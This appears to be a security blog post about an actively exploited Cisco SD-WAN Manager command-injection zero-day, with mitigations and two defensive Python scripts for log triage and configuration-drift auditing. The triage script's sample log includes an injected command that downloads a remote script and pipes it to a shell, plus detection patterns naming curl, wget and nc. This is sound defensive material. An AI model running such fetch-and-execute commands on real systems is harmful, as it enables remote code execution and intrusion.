
June 5, 2026

Active exploitation of unpatched Cisco SD‑WAN Manager flaw


At a glance: Cisco reported a zero‑day vulnerability in Cisco Catalyst SD‑WAN Manager that enables attackers with netadmin access to execute commands as root and push unauthorized configurations to edge devices. The flaw remains unpatched and affects all deployment models, including cloud‑managed and government environments. Organizations should review Cisco’s indicators of compromise (IOCs), preserve admin‑tech files, and apply available mitigations immediately.

Threat summary

On June 4, 2026, Cisco issued a security advisory for a privilege-escalation zero-day in Cisco Catalyst Software-Defined Wide Area Network (SD-WAN) Manager after observing targeted exploitation in the wild.

At the time of reporting, the flaw remains unpatched and affects all deployment models, including:

  • On-Prem Deployment
  • Cisco SD-WAN Cloud-Pro
  • Cisco SD-WAN Cloud (Cisco Managed)
  • Cisco SD-WAN for Government (FedRAMP)

Cisco has observed exploitation leading to unauthorized configuration changes pushed to SD-WAN edge devices.

Cisco Catalyst SD-WAN Manager (formerly SD-WAN vManage) is the centralized management and orchestration platform for Cisco SD-WAN deployments. It controls configuration, routing, security policies, device onboarding, and monitoring across distributed enterprise networks. Because SD-WAN Manager controls the entire SD-WAN environment, compromise of this system could give an adversary access to edge devices and control over network traffic.

The flaw, tracked as CVE-2026-20245, is a command-injection vulnerability in the SD-WAN Manager command-line interface. It carries a Common Vulnerability Scoring System (CVSS) version 3.1 base score of 7.8, rated as high severity.

Successful exploitation requires an authenticated session with netadmin privileges, obtained either with valid credentials or by first exploiting CVE-2026-20182 or CVE-2026-20127; Cisco reports that the observed exploitation used only these access paths. In the limited cases observed, exploitation led to configuration changes being pushed to edge devices.

The flaw enables a threat actor to upload malicious files and execute operating system commands with root privileges. Root-level compromise of the SD-WAN Manager host enables unauthorized configuration changes and potential propagation of malicious configurations to all managed edge devices.

The worst-case scenario involves complete compromise of the SD-WAN management plane, enabling an adversary to alter routing, disable security controls, manipulate virtual private network (VPN) tunnels, and maintain long-term access across the enterprise network.

Analysis

Cisco published indicators of compromise (IOCs) that include specific log entries and command executions that may signal exploitation. Some of these entries can also appear during normal SD-WAN operations, so they must be reviewed in the context of the organization’s expected activity.

Cisco recommends collecting admin-tech files from all SD-WAN control components before any upgrade to preserve evidence for investigation. After collecting logs, teams can review files such as /var/log/scripts.log for entries that match Cisco’s IOCs and assess them against normal operational patterns.
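The triage below is an added example, not code from Cisco or the advisory. It runs a few generic command-injection heuristics (shell metacharacters, remote fetch tools, shell spawning) over constructed log lines and adds an "outside_change_window" tag to anything that falls outside a declared maintenance window for an approved account, which is the kind of operational context the advisory asks reviewers to apply. The log layout, the rules, the sample lines and the change-window data are all assumptions: the real scripts.log format is not reproduced, and the real indicators must be taken from Cisco's published IOC list.

```python
"""Triage SD-WAN Manager CLI/script log lines against command-injection heuristics.

Added example. The log layout, the rules and the sample lines are constructed and
stand in for Cisco's published IOCs; replace HIGH_RULES with the advisory's indicators.
"""
import re
from dataclasses import dataclass
from datetime import datetime


def parse_ts(text: str) -> datetime:
    """Parse an ISO-8601 UTC timestamp; fromisoformat() wants +00:00 rather than Z on older Pythons."""
    return datetime.fromisoformat(text.replace("Z", "+00:00"))


# Constructed layout: "<ISO-8601 UTC timestamp> <account> <command text>".
# Assumption: the real /var/log/scripts.log format is NOT reproduced here.
SAMPLE_LOG = """\
2026-06-03T09:14:02Z netadmin show control connections
2026-06-03T09:15:10Z netadmin show running-config
2026-06-03T22:41:55Z netadmin tools iperf; curl http://198.51.100.7/s.sh | sh
2026-06-03T22:42:03Z netadmin bash -c id
2026-06-04T01:05:30Z svc_backup show system status
"""

# Generic command-injection heuristics (constructed, treated as HIGH confidence): a
# management CLI should never carry shell metacharacters, fetch remote content, or spawn a shell.
HIGH_RULES = {
    "shell_metachar": re.compile(r"[;&|`]|\$\("),
    "remote_fetch": re.compile(r"\b(?:curl|wget|nc|ncat|tftp)\b"),
    "shell_spawn": re.compile(r"(?:^|[\s|;&])(?:bash|sh|dash)(?:\s+-c|\s*$)"),
}


@dataclass(frozen=True)
class ChangeWindow:
    start: datetime
    end: datetime
    accounts: frozenset  # accounts approved to make changes in this window


# Constructed operational context: the only approved admin activity on 2026-06-03
# was a 09:00-10:00 UTC window worked by the netadmin account.
CHANGE_WINDOWS = (
    ChangeWindow(parse_ts("2026-06-03T09:00:00Z"), parse_ts("2026-06-03T10:00:00Z"),
                 frozenset({"netadmin"})),
)


@dataclass(frozen=True)
class Finding:
    line_no: int
    ts: datetime
    user: str
    command: str
    rules: tuple      # names of the rules that fired, in evaluation order
    severity: str     # "HIGH" if any HIGH_RULES entry fired, else "LOW"


def in_change_window(ts: datetime, user: str, windows) -> bool:
    """True when the account was approved to act at that time."""
    return any(w.start <= ts <= w.end and user in w.accounts for w in windows)


def triage(log_text: str, windows) -> list:
    """Return one Finding per log line that fires any rule; clean lines produce nothing."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        parts = line.split(maxsplit=2)
        if len(parts) < 3:
            continue  # the constructed layout needs timestamp, account and command
        ts, user, command = parse_ts(parts[0]), parts[1], parts[2]
        rules = [name for name, rx in HIGH_RULES.items() if rx.search(command)]
        if not in_change_window(ts, user, windows):
            # Not an IOC by itself; it is the "expected activity" context the advisory asks for.
            rules.append("outside_change_window")
        if not rules:
            continue
        severity = "HIGH" if any(r in HIGH_RULES for r in rules) else "LOW"
        findings.append(Finding(line_no, ts, user, command, tuple(rules), severity))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG, CHANGE_WINDOWS):
        print(f"line {f.line_no} [{f.severity}] {f.user}: {f.command!r} -> {', '.join(f.rules)}")
```

On the constructed input, lines 3 and 4 come out HIGH (injection heuristics plus off-window), line 5 comes out LOW (an approved-looking command by an account with no change window), and the two in-window lines produce nothing. The point of the split is the one the advisory makes: a raw pattern hit on a management host is not by itself evidence, but a hit that no change record explains is where the investigation starts.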

Cisco recommends upgrading to the May 14, 2026 releases that fix CVE-2026-20182, the flaw adversaries used to obtain netadmin-level access; this closes one of the observed entry paths but does not fix CVE-2026-20245 itself, which remains unpatched. Cisco also recommends verifying the configuration of edge devices. In practice, this means comparing routing, templates, and policies against the organization's approved baselines and treating any difference that no administrator-initiated change explains as a potential sign of compromise.
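The audit below is an added example of that baseline check, not code from Cisco or the page. It flattens per-device configuration exports (assumed here to be nested dicts, as you would get from JSON) into dotted paths, diffs each device against its approved baseline, and marks every difference either AUTHORIZED, when an administrator change record covers that device and path, or UNAUTHORIZED otherwise. The device names, configuration contents and change records are constructed; a real SD-WAN Manager export would have a different schema.

```python
"""Audit edge-device configuration exports against an approved baseline and flag
differences that no administrator change record explains.

Added example; the configs and change records are constructed and simplified.
"""
from dataclasses import dataclass
from typing import Any, Optional

# Constructed approved baseline, keyed by device name (assumption: nested dicts from JSON).
BASELINE = {
    "edge-01": {
        "system": {"site-id": 101, "host-name": "edge-01"},
        "vpn0": {"routes": ["0.0.0.0/0 via 192.0.2.1"]},
        "policy": {"acl": ["permit 10.0.0.0/8", "deny any"]},
        "templates": ["branch-standard-v3"],
    },
    "edge-02": {
        "system": {"site-id": 102, "host-name": "edge-02"},
        "vpn0": {"routes": ["0.0.0.0/0 via 192.0.2.1"]},
        "policy": {"acl": ["permit 10.0.0.0/8", "deny any"]},
        "templates": ["branch-standard-v3"],
    },
}

# Constructed current export: edge-01 unchanged; edge-02 renamed (approved), its default
# route redirected and its ACL weakened (not approved); edge-03 was never in the baseline.
CURRENT_EXPORT = {
    "edge-01": BASELINE["edge-01"],
    "edge-02": {
        "system": {"site-id": 102, "host-name": "edge-02-dc"},
        "vpn0": {"routes": ["0.0.0.0/0 via 198.51.100.7"]},
        "policy": {"acl": ["permit 10.0.0.0/8"]},
        "templates": ["branch-standard-v3"],
    },
    "edge-03": {"system": {"site-id": 103, "host-name": "edge-03"}},
}

# Constructed change records: the only approved change was the edge-02 rename.
CHANGE_RECORDS = [
    {"device": "edge-02", "path": "system.host-name", "ticket": "CHG-1042"},
]


@dataclass(frozen=True)
class Drift:
    device: str
    path: str            # dotted path, or "*" for a whole-device finding
    baseline: Any
    current: Any
    ticket: Optional[str]
    status: str          # "AUTHORIZED", "UNAUTHORIZED", or "MISSING"


def flatten(cfg: dict, prefix: str = "") -> dict:
    """Flatten nested dicts into {"a.b.c": value}; lists are compared as whole values."""
    out = {}
    for key, value in cfg.items():
        path = f"{prefix}.{key}" if prefix else str(key)
        if isinstance(value, dict):
            out.update(flatten(value, path))
        else:
            out[path] = value
    return out


def diff_device(baseline: dict, current: dict) -> list:
    """Return (path, baseline_value, current_value) for every path that differs or is one-sided."""
    b, c = flatten(baseline), flatten(current)
    return [(p, b.get(p), c.get(p)) for p in sorted(set(b) | set(c)) if b.get(p) != c.get(p)]


def audit(baseline_by_device: dict, current_by_device: dict, change_records: list) -> list:
    """Classify every drift: covered by a change record -> AUTHORIZED, otherwise UNAUTHORIZED."""
    approved = {(r["device"], r["path"]): r["ticket"] for r in change_records}
    report = []
    for device in sorted(set(baseline_by_device) | set(current_by_device)):
        if device not in baseline_by_device:
            # A device the baseline never knew about is itself an unauthorized change.
            report.append(Drift(device, "*", None, "present", None, "UNAUTHORIZED"))
            continue
        if device not in current_by_device:
            report.append(Drift(device, "*", "present", None, None, "MISSING"))
            continue
        for path, old, new in diff_device(baseline_by_device[device], current_by_device[device]):
            ticket = approved.get((device, path))
            report.append(Drift(device, path, old, new, ticket,
                                "AUTHORIZED" if ticket else "UNAUTHORIZED"))
    return report


if __name__ == "__main__":
    for d in audit(BASELINE, CURRENT_EXPORT, CHANGE_RECORDS):
        print(f"{d.status:12} {d.device} {d.path}: {d.baseline!r} -> {d.current!r}"
              + (f" ({d.ticket})" if d.ticket else ""))
```

On the constructed data the rename is AUTHORIZED under CHG-1042, while the redirected default route, the dropped "deny any" ACL entry and the unknown edge-03 all come out UNAUTHORIZED; edge-01 produces no findings. Matching on exact (device, path) rather than on device alone is deliberate: an attacker who pushes a routing change during a legitimate rename should not inherit that ticket's approval.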

Limiting access to SD-WAN Manager to dedicated administrative networks, enforcing strong authentication for netadmin accounts, and centralizing log collection across SD-WAN Manager and controllers further reduces exposure. Using Cisco’s IOCs in monitoring tools and regularly checking that SD-WAN configurations match expected settings supports early detection of unauthorized changes.
